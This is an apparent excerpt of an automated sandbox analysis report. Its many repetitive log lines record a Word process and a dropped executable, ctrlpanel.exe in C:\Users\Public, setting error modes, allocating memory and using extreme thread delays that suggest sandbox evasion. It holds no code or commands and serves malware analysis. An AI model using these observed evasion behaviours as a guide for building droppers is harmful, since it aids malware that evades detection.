          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\ctrlpanel.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeMemory allocated: 1AB10000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exeWindow / User API: threadDelayed 1817Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exeWindow / User API: threadDelayed 633Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exeWindow / User API: threadDelayed 5234Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exeWindow / User API: threadDelayed 852Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exeWindow / User API: threadDelayed 700Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep count: 1817 > 30Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep time: -1675886699096511709s >= -30000sJump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep count: 633 > 30Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep count: 5234 > 30Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep time: -78510s >= -30000sJump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep count: 852 > 30Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep time: -2556000s >= -30000sJump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep count: 700 > 30Jump to behavior
          Source: C:\Users\Public\ctrlpanel.exe TID: 7524Thread sleep time: -2100000s >= -30000sJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Word\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Word.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Word\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Word.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\office\15.0.0.0__71e9bce111e9429c\OFFICE.DLL VolumeInformationJump to behavior
